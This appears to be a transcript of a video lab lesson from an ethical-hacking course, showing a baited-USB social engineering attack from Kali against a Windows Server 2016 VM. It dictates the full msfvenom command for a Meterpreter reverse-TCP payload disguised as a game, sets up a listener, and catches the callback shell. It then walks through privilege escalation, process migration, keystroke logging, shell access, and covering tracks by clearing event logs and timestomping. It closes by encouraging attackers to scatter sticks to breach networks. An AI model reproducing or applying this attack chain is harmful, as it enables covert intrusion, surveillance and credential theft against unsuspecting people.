In this activity, we're going to use a very common sort of social engineering, and that is to create an infected USB stick, what we call a baited USB stick. So what we're going to do is we have Kali as the attacker, and we have Server 2016 as the victim. And what we're going to do is we're going to create the phony USB stick. Well, it's a real USB stick, but it has a fake application, an infected application. We're going to create it on Kali, and we're going to physically move it over to Server 2016. This is to simulate you've created some baited USB sticks and you've scattered them around in the parking lot or someplace where you know the victim is likely to pick it up. And we'll have Kali sitting here waiting, because when the victim comes and plugs the USB stick into Server 2016 and they launch the infected application, it will make a connection in the background back to the attacker. So when you look at your reference guide here, there are some things we have to type in Kali, and they're rather lengthy, so you got to hang with me here. So the first thing to do is to create a payload. So we're going to launch a terminal. Now this tool we're using, MSF Venom, is not in the Metasploit console, although it works with Metasploit. So come over to Kali and start a terminal. Click terminal. Let me zoom in a little bit so we can just see it. And I'm going to, this is all one long line, even though it's showing up here as two lines, it's one long line. So let's type it, hope we don't make any mistakes. MSF Venom, TAC P for create a payload, Windows x64. So this is a payload for Windows 64-bit. It is Meterpreter, which is the sort of gold standard of interactive hacking payloads. Reverse, if I can type properly, reverse_TCP. And the purpose of the reverse TCP is so that they will connect back to us rather than the attacker connecting to them. And now we have to tell them what to connect to. So the L host, the listening host, is, and in other words, the attacker, is 192.168.75.154. You got to double check Kali's IP address. And if you don't know, or if you're not sure, start a new terminal, right click and create a new window, and just type ifconfig, ifconfig, press enter. And yep, sure enough, it's 192.168.75.154. Yours may be different. In fact, yours is likely to be different. So going back to where we were, I'm going to right click, I'm going to all windows, and I'm going to go back to where I was typing MSF Venom. Okay, so the listener host, the attacker, is that IP, and then the listening port, L port, in other words, victim connect to this port is 4444, which is the default for Metasploit. You don't have to use 4444. You can actually use any port that your Kali is not listening on already. Kali, by the way, has no services running by default, so you could use 80, 443, 53, a whole bunch of things. And then we're going to TAC F, meaning the file type. It is an executable. And then TAC A, meaning the architecture. It is an x64, meaning the target is an x64, because a 64-bit payload is going to be different from a 32-bit payload. The output, TAC small o, is going to be on the root desktop. Notice how desktop is a capital D. And I'm going to call it awesome-game exe. You call it anything you like. I'm going to press enter. And in a moment, it's going to create this payload. And we're just going to validate that it's there and that we have it and it's usable. So it won't take too long. In a moment, it'll create it. It'll be about 7 or so, 10 kilobytes in size. All right, it created it. The payload itself is very small, 510 bytes. It's really a stager that makes a connection back to the attacker, which then downloads, or the stager downloads from the attacker all of the main payload files. The final size is about 7 kilobytes in size, and it's saved on the desktop as awesome game exe. If I minimize this, we will see, there it is, Awesome Game exe. For heaven's sake, don't double click it here. You don't want to infect yourself, although the payload would not work on Linux. Okay, going back to where we were. So we have that ready. So now we need to create what's called a listener. In order to create the listener, we have to now be in the Metasploit console. So to get in the Metasploit console, you can either type the word MSF console here at a regular terminal, press enter, and it'll launch it, or you can come over here to the favorites bar where the launchers are and click the little blue shield with the M. Either way, it will start the Metasploit console. So we're waiting for this. When this comes up, we're going to use exploit multi-handler, meaning this handler handles sessions coming in. The payload on the handler must agree with the payload on the malicious stick. And, you could have multiple handlers with multiple payloads on multiple sticks that you scatter around. And we're going to set various options to have the whole thing ready. So let's start with use exploit multi-handler. Press enter. Let's set the payload Windows x64 meterpreter reverse _ TCP. Enter. Let's show options. What else do we have to set? Enter. We still need to set the listener host. So we have to tell Kali what interface, what IP address to listen on, because Kali might have more than one. Or we could even set it up where it's not us, it's something else, it's somebody else. So let's set lhost, and you don't have to say equals here, you just say set lhost Kali's IP 192.168.75.154. Enter. And you're successful when you see these responses. Let's is there anything else? The port is there by default. Had we chosen a different port up here, we would have to choose a different port down here, but we chose the default, so it's fine. So now we have to say run. If I scroll down here in the commands, we have to we don't have to set the listener port, it's already done because it's the default, and just say run. Alternatively, you could type the word exploit. They both do the same thing. Press enter, and the handler is ready. It's waiting. It's waiting for anybody to come in and make a connection to this. And so then the goal is we would create a bunch of these USB sticks and scatter them all around and see who makes a connection, because this handler can have multiple connections coming into it. Okay, so this thing is ready. I'm just going to minimize it. For heaven's sakes, don't close it. I'm going to minimize it, and I'm going to put Awesome Game on a USB stick, and I'm going to move it over to Server 2016. Now, I have an actual USB stick here. It's a really simple one. It's like, I'm looking at it, it's really small. It's 8 gigs. That's not too bad. But because this little game is so tiny, you can use pretty much anything in a little 250 megabyte, 512 megabyte, USB stick. You could use pretty much any little stick will work for your activity. I have physically plugged it into my laptop here, and it has popped up and says, hey, who would you like to connect to? I'm going to connect to a VM, and I'm going to connect to the Kali VM, and click OK. So it should show up in the Kali VM as a plugged-in USB stick. It's going to show up in just a moment. There it is. And here it is right here. And I'm just going to open it up, and I'm going to just drag and drop this thing. So let me open this up. Double click it, open it up. And I'm just going to move this a little bit, and I'm going to move Awesome Game into here. Okay, so Awesome Game is there. Now let me close it. All right, so now let me right-click this thing and eject the stick, kind of like what we do in Macintoshes. Now I need to, in VMware, I've ejected it from the operating system's perspective, but I need to eject it from VMware's perspective as well. So I go to Player and to Removable Devices, and there's that little stick. I'm going to uncheck it so it becomes available again. So let me just uncheck this little puppy. My Kali machine is, or actually I'm going to disconnect. Removable devices, disk, disconnect, connect to host. Okay. So it's on the host now, but now I'm going to connect it over to Server 2016. This is simulating me finding it and plugging it into my workstation. The victim does this. So in the Server 2016, I'm going to click Player, Removable Devices. I see the disk, and I'm going to disconnect from host. So it says, fine. So I should be able to see it in just a moment. It's loading up, driver is loading for it. So this person has picked up this stick and has plugged it in and gone, I wonder what's on this. They're curious, So we open up the File Explorer. I'm going to click the File Explorer. And I'm going to find the stick, and I'm going to find this awesome game on it. And I'm curious, so I'm going to launch it. So here's the stick. And in just a moment, I should see the stick. Server 2016 is also slow. Just kind of waiting for this thing to pop up. It's not there just yet. As soon as it pops up, I'm going to go take a look at it. Okay, there it is. Let me just click this. There's awesome game. All right, so the person's all eager, and they launch awesome game. Now, before I do that, I'm going to come back to Kali, and I'm going to open up the terminal window so we can watch what's happening. The handler is sitting here waiting for something to happen. The user double-clicks the infection, and right away the connection is made. So notice, sending stage to 192.168.75.16. Stage simply means the main part of the infected software. The stager, which is what Awesome Game is, the stager, is just big enough to make a connection out to Metasploit and say, hey, let me download the rest of the malware. So we've sent the rest of the malware here. That's what sending stage is all about. And Meterpreter session 1 is now open. And you can see from Kali, 192.168.75.154, port 4444, to 192.168.75.16, some random port. So now we have a Meterpreter prompt. And this is now running on the victim. So we can type a question mark, press enter, and you can scroll back. There are loads of Meterpreter Metasploit things we can do. I'm going to just minimize some of this stuff here. And I'm going to maximize Kali so that we can just see better. Let me just open a new terminal window here. And let me xrandr TAC-S 1680 by 1050 just to make this a whole lot bigger. And let me just zoom in. Oh wait, actually I don't want to zoom that one. I want to zoom the other one. Let me go back to right click all windows, and I'm going to pick the Meterpreter prompt that we have, and let me zoom in here so we can just kind of see. Let me just expand this a bit so we can see. There are so many Meterpreter commands. So I just want to point out a few of them. So the Meterpreter commands, we have what are called the core commands. So we can get help. We can background our session in case you have multiple sessions. You want to toggle between multiple victims. We can kill a session. We can close. We can exit out. So this is sort of housekeeping stuff. Then we can, on the victim, we can read the contents of a file. We can change directory and navigate around. We can copy files. We can double check the checksum of a file. We can type the dir command just to list stuff. We can download. We can edit files. We can get the local and present working directories. So get WD, get LWD would be our local directory, and then the present working directory where we're at in the target. We can change local working directory. We can make directories. We can list files. So some of these are DOS commands. Some of these are Linux bash commands. We can just simply pwd, where am I? We can remove files or remove directories. We can search for files. We can upload. When we download here, we can upload here. We can see mount points or drives that are mounted. So these are just a few. We can then do networking commands. We can view the ARP cache of the target. We can view the IP configuration, netstat. We can view the route cache. We can clear their event log if you want to, which would be what you do when you hide your tracks, cover your tracks. We can, let's see, execute a command on the remote system, which we can do a variety of ways. We can get the process ID, we can get the environment variables. We can set ourselves, we can get the SID of the user that whatever the service is running at. We can kill one of the processes on the other device. So we can get PID, would show the process of the Meterpreter, where Meterpreter has basically infected. We can list all the running processes. We can reboot them. We can modify the registry. We can drop to one of their own shells. And in this case, that would be a command prompt. We can just shut down the remote computer. We could steal tokens. So like if the administrator is logged on, we could steal their token and impersonate them, do things as if we were them, get system information. So there are just so many commands. We can start doing key scanning. We can start capturing keystrokes and grab screenshots of the desktop that they're on. Start recording their microphone, their webcam. Take pictures, stream their webcam, and watch it in real time. Play an audio file on their target system, and that would freak them out, especially if we uploaded a scary audio file. We could try to elevate our privilege level, and I talked earlier about you get in as sort of a normal standard Joe Blow user, and then you get system to try to elevate your privilege. We can dump all the hashes from their database and try to crack them, which we will get to when we do system hacking. So let's just present working directory. Where are we? Right now we're in the administrator desktop because that's where the admin put awesome game. And see, does who am I work? Who am I? No, who am I is not one of the commands. We could, let's see, we could get, scroll up here. We could try to get system level privilege above administrator privilege. So let's see if we can get system, which means we have even more privilege than admin. So let's see if we can do that. Get system. And okay. So now what we can do is we can get UID. Who am I right now? I mean, what's my user ID? I am now system, which is awesome. So I'm above administrator. I don't have any audio files to play. They don't have a webcam or a microphone, too bad. Let's see. We could do a keystroke logger, but in order to do that, you have to migrate to a process that handles typing. So what we need to do is we need to find out what process we're in right now. So we need to get PID, and then we need to PS to find out what process we're actually in. So let's do that. Let's get PID, get PID, process ID. So we're currently injected. We have malicious code injected into process ID 1764. Let's type PS. What processes are there? So we have to look for 1764. Now, when we look here, there are two numbers. There's the process ID and the parent process ID. We don't want the PPID. We want the PID. So let's look for 1764 on the left-hand side. There it is right there. And we're running as this executable awesome game. And so and it's being run by the administrator. Okay, so now awesome game in and of itself does not have the ability to capture keystrokes. So we're going to capture some keystrokes. So let's migrate to something that does have the ability to capture keystrokes. The Explorer exe, which manages the Windows desktop, that would be a clear target. So let's scroll down and try to find the process of Explorer exe and find out what, there it is right there, Explorer exe, and it is process ID 2080. So we have to say migrate 2080. See if we can move away from Awesome Game to Windows Explorer. This is not Internet Explorer. This is not the browser. This is the thing that manages the desktop. Okay, now we are now no longer in Awesome Game. It doesn't matter what happens to Awesome Game. We are now have our malicious code injected into the Windows Explorer. So long as the user does not log out, we are now in system level privilege in something that hopefully will be pretty stable. Of course, Windows Explorer is not always stable, but that's another matter. So now with that, we can keyscan _start. And so it's starting a keystroke sniffer. If we switch over to Windows 2016, and so the user's going la la la, doing whatever they do, and they start, say, a text editor of whatever kind, we don't really care, Notepad. I typed Notepad. And like I said, sorry, my system's a little bit slow. So it's Windows Explorer that manages all of this stuff. So super secret message. And you don't even have to save anything. We're capturing the keystrokes. So going back to Kali over here, we can keyscan _dump. And there it is right there. And you can see it was even capturing when I typed Note P to start Notepad. It captured even that. And then super secret message. So we're capturing keystrokes, and we can regularly dump the key scanner as the guy is typing. So now let's just keyscan. Let's keyscan _stop, because we're done. We're done with the keystroke sniffer. What else could we do? We could navigate around, or we could drop to a shell, and we could just use DOS commands. So we could just say the word shell. Press enter. We are now, look at this, in the Windows command prompt on Server 2016 in system level privilege. So let's cd whack. Now we're at the C drive and dir, and you can see we're at the C drive right here, and cd users and dir, and let's go into administrator desktop here, cd administrator dir, and we should see desktop. Let's go into their desktop, cd desktop, and let's dir. We can see the stuff that's on the person's desktop, including there's Awesome Game, which they put on the desktop. We could make dir a directory called pwned. And if we dir, there is the directory called pwned. And if we go over to Server 2016 here and minimize this, suddenly this thing appeared on the desktop called pwned. So, I mean, we can have loads of fun here. We can upload, we can download. If we wanted to play sounds or do whatever, or do some far more serious things besides just playing sounds and being silly, we could also get out of the shell by typing exit, and we're back to the interpreter prompt, and press question mark again to see all of the various choices. We could dump contents from the SAM database, which we will do later. We could modify the time stamps with this command called timestamp to modify the modified archive created values of any files, so it would look like we hadn't touched them. What else can we do just for giggles and grins here? We could shut down or kill processes. We could get the SID of the current user, but we're system, so we don't care. Clear the event log, execute a command, but we can also drop to the shell and execute a command as well, which we did. We could ipconfig and ARP, and without dropping to a shell, and netstat. Why don't we do that? ARP. That's the ARP cache of Server 2016, not our own ARP cache. Let's netstat. And this is Server 2016's netstat, not ours. How about ipconfig? ipconfig. And so we can see the configuration for Server 2016. Sure enough, that's its IP address, IPv4 address, and there's its IPv6 link local address. So loads of fun here. Once we have an interpreter prompt, you can see why it's the gold standard for an interactive malicious prompt. So that is how we use a baited USB stick to get into a target. And where this is really useful is maybe you found that there's no way, or you haven't found a way yet to get in remotely. Well, heck, if we can just scatter USB sticks, and several of them here and there, maybe several users will plug them in, and we can have sessions with all those users, and that's how we get into the network, and from there we pivot in farther. So that's having fun with baited USB sticks in social engineering.